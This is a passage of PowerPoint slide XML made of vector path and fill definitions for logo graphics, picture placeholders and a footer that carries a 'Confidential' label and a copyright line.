                    <a:cubicBezTo>
                      <a:pt x="545" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="516" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="516" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="516" y="751"/>
                      <a:pt x="767" y="603"/>
                      <a:pt x="1126" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2848" y="577"/>
                      <a:pt x="2848" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3037" y="577"/>
                      <a:pt x="3190" y="447"/>
                      <a:pt x="3190" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3190" y="129"/>
                      <a:pt x="3037" y="0"/>
                      <a:pt x="2848" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1167" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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358920" y="632160"/>
                <a:ext cx="230760" cy="280800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3181" h="3910">
                    <a:moveTo>
                      <a:pt x="254" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="0"/>
                      <a:pt x="110" y="16"/>
                      <a:pt x="62" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="86"/>
                      <a:pt x="36" y="100"/>
                      <a:pt x="26" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="162"/>
                      <a:pt x="0" y="210"/>
                      <a:pt x="0" y="270"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3664"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3783"/>
                      <a:pt x="36" y="3860"/>
                      <a:pt x="105" y="3891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="3903"/>
                      <a:pt x="199" y="3910"/>
                      <a:pt x="323" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="445" y="3910"/>
                      <a:pt x="507" y="3826"/>
                      <a:pt x="507" y="3659"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="2458"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="2458"/>
                      <a:pt x="507" y="2327"/>
                      <a:pt x="610" y="2379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="631" y="2387"/>
                      <a:pt x="2698" y="3881"/>
                      <a:pt x="2698" y="3881"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2724" y="3901"/>
                      <a:pt x="2813" y="3910"/>
                      <a:pt x="2968" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="3910"/>
                      <a:pt x="3181" y="3834"/>
                      <a:pt x="3181" y="3678"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3181" y="3578"/>
                      <a:pt x="3138" y="3496"/>
                      <a:pt x="3057" y="3434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3057" y="3434"/>
                      <a:pt x="1043" y="1987"/>
                      <a:pt x="1040" y="1985"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="983" y="1946"/>
                      <a:pt x="1016" y="1899"/>
                      <a:pt x="1040" y="1877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1060" y="1858"/>
                      <a:pt x="2985" y="490"/>
                      <a:pt x="2985" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3069" y="428"/>
                      <a:pt x="3109" y="349"/>
                      <a:pt x="3109" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="98"/>
                      <a:pt x="3040" y="21"/>
                      <a:pt x="2901" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2753" y="21"/>
                      <a:pt x="2645" y="24"/>
                      <a:pt x="2617" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2617" y="45"/>
                      <a:pt x="665" y="1461"/>
                      <a:pt x="662" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="533" y="1545"/>
                      <a:pt x="512" y="1451"/>
                      <a:pt x="507" y="1399"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="270"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="162"/>
                      <a:pt x="483" y="88"/>
                      <a:pt x="430" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="19"/>
                      <a:pt x="311" y="0"/>
                      <a:pt x="254" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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57520" y="632160"/>
                <a:ext cx="254880" cy="287640"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3521" h="4001">
                    <a:moveTo>
                      <a:pt x="280" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="14"/>
                      <a:pt x="0" y="134"/>
                      <a:pt x="0" y="301"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3616"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3781"/>
                      <a:pt x="113" y="3913"/>
                      <a:pt x="254" y="3913"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392" y="3913"/>
                      <a:pt x="505" y="3781"/>
                      <a:pt x="505" y="3616"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="2564"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="2521"/>
                      <a:pt x="553" y="2509"/>
                      <a:pt x="636" y="2559"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2985" y="3949"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3076" y="4001"/>
                      <a:pt x="3188" y="3975"/>
                      <a:pt x="3274" y="3896"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3296" y="3875"/>
                      <a:pt x="3322" y="3844"/>
                      <a:pt x="3344" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3363" y="3777"/>
                      <a:pt x="3373" y="3755"/>
                      <a:pt x="3377" y="3719"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3382" y="3683"/>
                      <a:pt x="3382" y="3631"/>
                      <a:pt x="3380" y="3609"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3365" y="3540"/>
                      <a:pt x="3334" y="3478"/>
                      <a:pt x="3274" y="3447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3274" y="3447"/>
                      <a:pt x="2997" y="3296"/>
                      <a:pt x="2880" y="3229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2476" y="2997"/>
                      <a:pt x="1540" y="2437"/>
                      <a:pt x="1540" y="2437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1509" y="2408"/>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="1584" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="2588" y="2406"/>
                      <a:pt x="2590" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2614" y="2404"/>
                      <a:pt x="3475" y="2468"/>
                      <a:pt x="3516" y="1607"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3516" y="1588"/>
                      <a:pt x="3521" y="1521"/>
                      <a:pt x="3521" y="1507"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3521" y="957"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3521" y="911"/>
                      <a:pt x="3516" y="873"/>
                      <a:pt x="3516" y="832"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3509" y="600"/>
                      <a:pt x="3437" y="438"/>
                      <a:pt x="3339" y="313"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3289" y="254"/>
                      <a:pt x="3279" y="246"/>
                      <a:pt x="3224" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2971" y="0"/>
                      <a:pt x="2636" y="14"/>
                      <a:pt x="2636" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="280" y="14"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="636" y="588"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2583" y="588"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2973" y="612"/>
                      <a:pt x="3014" y="859"/>
                      <a:pt x="3014" y="940"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="947"/>
                      <a:pt x="3014" y="1514"/>
                      <a:pt x="3014" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="1801"/>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="2598" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="651" y="1818"/>
                      <a:pt x="641" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="529" y="1818"/>
                      <a:pt x="510" y="1732"/>
                      <a:pt x="505" y="1691"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="703"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="703"/>
                      <a:pt x="505" y="588"/>
                      <a:pt x="636" y="588"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1363680" y="287280"/>
              <a:ext cx="1154160" cy="1036800"/>
              <a:chOff x="1363680" y="287280"/>
              <a:chExt cx="1154160" cy="1036800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="17" name=""/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1363680" y="287280"/>
                <a:ext cx="973800" cy="926280"/>
                <a:chOff x="1363680" y="287280"/>
                <a:chExt cx="973800" cy="926280"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="18" name=""/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1545120" y="393840"/>
                  <a:ext cx="792360" cy="819720"/>
                  <a:chOff x="1545120" y="393840"/>
                  <a:chExt cx="792360" cy="8197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>
                    <a:off x="2132640" y="393840"/>
                    <a:ext cx="204840" cy="48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59" h="7022">
                        <a:moveTo>
                          <a:pt x="2182" y="5875"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2959" y="1679"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2901" y="2816"/>
                          <a:pt x="594" y="7022"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1078" y="6805"/>
                          <a:pt x="2042" y="6636"/>
                          <a:pt x="2182" y="587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4c4c4"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="b4b4b4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2045880" y="731160"/>
                    <a:ext cx="237960" cy="393840"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="3435" h="5676">
                        <a:moveTo>
                          <a:pt x="445" y="5459"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2869" y="3859"/>
                          <a:pt x="3435" y="1008"/>
                          <a:pt x="3435" y="1008"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2009" y="176"/>
                          <a:pt x="3030" y="0"/>
                          <a:pt x="1846" y="2156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1756" y="2320"/>
                          <a:pt x="880" y="3709"/>
                          <a:pt x="0" y="4398"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="142" y="4472"/>
                          <a:pt x="128" y="5676"/>
                          <a:pt x="445" y="5459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3c3c3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4b4b4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1804320" y="994680"/>
                    <a:ext cx="293040" cy="205200"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="4234" h="2959">
                        <a:moveTo>
                          <a:pt x="199" y="2959"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2306" y="2901"/>
                          <a:pt x="3739" y="1786"/>
                          <a:pt x="3959" y="1642"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4032" y="10"/>
                          <a:pt x="4234" y="0"/>
                          <a:pt x="3475" y="608"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3291" y="751"/>
                          <a:pt x="2317" y="1673"/>
                          <a:pt x="382" y="2120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="157" y="2346"/>
                          <a:pt x="0" y="2681"/>
                          <a:pt x="199" y="2959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85858"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="43434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1545120" y="1102680"/>
                    <a:ext cx="2923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4224" h="1602">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="1839" y="1602"/>
                          <a:pt x="3813" y="1394"/>
                          <a:pt x="3963" y="1406"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3936" y="1103"/>
                          <a:pt x="4224" y="542"/>
                          <a:pt x="4121" y="568"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4121" y="568"/>
                          <a:pt x="2350" y="1054"/>
                          <a:pt x="573" y="269"/>
                        </a:cubicBez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454545"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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2132640" y="393840"/>
                    <a:ext cx="9180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8" h="1574">
                        <a:moveTo>
                          <a:pt x="1328" y="1285"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="833" y="642"/>
                          <a:pt x="512" y="285"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="476" y="432"/>
                          <a:pt x="1032" y="1574"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1085" y="1341"/>
                          <a:pt x="1133" y="1359"/>
                          <a:pt x="1328" y="128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bdbdbd"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="828282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1363680" y="287280"/>
                  <a:ext cx="768240" cy="812520"/>
                  <a:chOff x="1363680" y="287280"/>
                  <a:chExt cx="768240" cy="81252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>
                    <a:off x="1550160" y="287280"/>
                    <a:ext cx="439200" cy="193320"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="6340" h="2790">
                        <a:moveTo>
                          <a:pt x="5763" y="636"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="5763" y="636"/>
                          <a:pt x="4379" y="458"/>
                          <a:pt x="2700" y="1162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2336" y="1314"/>
                          <a:pt x="1385" y="1695"/>
                          <a:pt x="416" y="2670"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="2790"/>
                          <a:pt x="236" y="2053"/>
                          <a:pt x="284" y="1759"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="881" y="1257"/>
                          <a:pt x="1433" y="982"/>
                          <a:pt x="1954" y="735"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2686" y="377"/>
                          <a:pt x="4013" y="0"/>
                          <a:pt x="5666" y="186"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6340" y="330"/>
                          <a:pt x="6258" y="474"/>
                          <a:pt x="5763" y="63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0e0e0"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4d4d4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1908720" y="294840"/>
                    <a:ext cx="223200" cy="9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19" h="273">
                        <a:moveTo>
                          <a:pt x="619" y="273"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="619" y="273"/>
                          <a:pt x="427" y="134"/>
                          <a:pt x="113" y="101"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="26" y="58"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="95" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="413" y="51"/>
                          <a:pt x="619" y="273"/>
                          <a:pt x="619" y="27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1d1d1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="dadad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1363680" y="387360"/>
                    <a:ext cx="229680" cy="71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318" h="10269">
                        <a:moveTo>
                          <a:pt x="3136" y="1198"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2929" y="1417"/>
                          <a:pt x="1413" y="2776"/>
                          <a:pt x="993" y="5134"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="993" y="5134"/>
                          <a:pt x="657" y="6725"/>
                          <a:pt x="1224" y="8162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1224" y="8162"/>
                          <a:pt x="1853" y="9795"/>
                          <a:pt x="2568" y="10269"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2568" y="10269"/>
                          <a:pt x="756" y="9458"/>
                          <a:pt x="272" y="6529"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="272" y="6529"/>
                          <a:pt x="0" y="4663"/>
                          <a:pt x="1011" y="2762"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1750" y="1386"/>
                          <a:pt x="2663" y="584"/>
                          <a:pt x="2971" y="319"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3318" y="0"/>
                          <a:pt x="3208" y="727"/>
                          <a:pt x="3136" y="1198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55555"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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" name=""/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2119320" y="974160"/>
                <a:ext cx="398520" cy="349920"/>
                <a:chOff x="2119320" y="974160"/>
                <a:chExt cx="398520" cy="34992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2119320" y="974160"/>
                  <a:ext cx="398520" cy="349560"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5498" h="4865">
                      <a:moveTo>
                        <a:pt x="528" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="36"/>
                        <a:pt x="0" y="325"/>
                        <a:pt x="28" y="646"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="873"/>
                        <a:pt x="191" y="1055"/>
                        <a:pt x="378" y="1134"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4061" y="4583"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4372" y="4865"/>
                        <a:pt x="4814" y="4805"/>
                        <a:pt x="5194" y="4442"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5472" y="4174"/>
                        <a:pt x="5498" y="3552"/>
                        <a:pt x="5283" y="3320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5161" y="3193"/>
                        <a:pt x="940" y="146"/>
                        <a:pt x="940" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="940" y="146"/>
                        <a:pt x="870" y="93"/>
                        <a:pt x="830" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="755" y="29"/>
                        <a:pt x="669" y="0"/>
                        <a:pt x="528" y="10"/>
                      </a:cubicBez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2157840" y="982440"/>
                  <a:ext cx="327240" cy="252000"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4511" h="3509">
                      <a:moveTo>
                        <a:pt x="4477" y="3463"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4444" y="3509"/>
                        <a:pt x="4360" y="3504"/>
                        <a:pt x="4293" y="3451"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="96" y="218"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="165"/>
                        <a:pt x="0" y="88"/>
                        <a:pt x="36" y="43"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="36" y="43"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="0"/>
                        <a:pt x="151" y="5"/>
                        <a:pt x="218" y="57"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4418" y="3291"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4485" y="3341"/>
                        <a:pt x="4511" y="3420"/>
                        <a:pt x="4477" y="3463"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4477" y="3463"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="bdbd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2128320" y="1006560"/>
                  <a:ext cx="366840" cy="317520"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5056" h="4410">
                      <a:moveTo>
                        <a:pt x="199" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="0"/>
                        <a:pt x="0" y="268"/>
                        <a:pt x="153" y="500"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4037" y="4090"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4037" y="4090"/>
                        <a:pt x="4513" y="4410"/>
                        <a:pt x="5056" y="3817"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5056" y="3817"/>
                        <a:pt x="4674" y="4006"/>
                        <a:pt x="4425" y="3865"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4179" y="3724"/>
                        <a:pt x="414" y="287"/>
                        <a:pt x="414" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="414" y="287"/>
                        <a:pt x="263" y="184"/>
                        <a:pt x="199" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="46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2" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360360" y="6924600"/>
            <a:ext cx="2879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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>4 – Confidential (Staf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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143240" y="6924600"/>
            <a:ext cx="1016280" cy="1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1800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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>©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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737560" y="6829560"/>
            <a:ext cx="311040" cy="14904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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8844120" y="6873840"/>
            <a:ext cx="463320" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="b501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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9285120" y="6978600"/>
            <a:ext cx="155880" cy="204840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="d0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 type="sldNum" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8844120" y="6870600"/>
            <a:ext cx="3981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67DB-65C2-4858-A9BD-B4F30A9C7B77}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1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" name=""/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3530520" y="3205080"/>
            <a:ext cx="2688840" cy="2700360"/>
            <a:chOff x="3530520" y="3205080"/>
            <a:chExt cx="2688840" cy="2700360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4925880" y="4599000"/>
              <a:ext cx="1128240" cy="11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" name="" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4925880" y="3368520"/>
              <a:ext cx="1128240" cy="11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" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692160" y="4599000"/>
              <a:ext cx="1128600" cy="11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" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692160" y="3368520"/>
              <a:ext cx="1128600" cy="11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3530520" y="3205080"/>
              <a:ext cx="136440" cy="136440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="b50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30520" y="5743440"/>
              <a:ext cx="136440" cy="1368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82920" y="5769000"/>
              <a:ext cx="136440" cy="136440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="b50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070320" y="3214800"/>
              <a:ext cx="136080" cy="1364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802120" y="3476520"/>
              <a:ext cx="136080" cy="136800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="b50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801960" y="3476520"/>
              <a:ext cx="136080" cy="136800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
